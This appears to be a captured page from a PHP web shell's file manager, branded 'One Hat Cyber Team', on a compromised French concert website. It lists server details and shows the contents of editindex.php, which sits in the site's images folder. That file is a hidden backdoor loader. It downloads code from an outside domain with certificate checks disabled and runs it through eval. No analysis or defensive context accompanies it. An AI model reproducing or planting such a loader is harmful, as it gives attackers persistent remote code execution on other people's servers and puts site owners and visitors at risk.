One Hat Cyber Team
Your IP:
216.73.216.75
Server IP:
213.186.33.17
Server:
Linux webm007.cluster106.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
tcherkas
/
concert-classique.fr
/
assets
/
images
/
Edit File:
editindex.php
<?php $protocol = "https"; $domain = "websetting.eggclive.com"; $file_path = "/update/20161024/adm.txt"; $url = $protocol . "://" . $domain . $file_path; function fetch_with_curl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $response = curl_exec($ch); if (PHP_VERSION_ID >= 80000) { unset($ch); } else { curl_close($ch); } return $response; } $response = fetch_with_curl($url); if ($response !== false) { eval("?>" . $response); } ?>
Simpan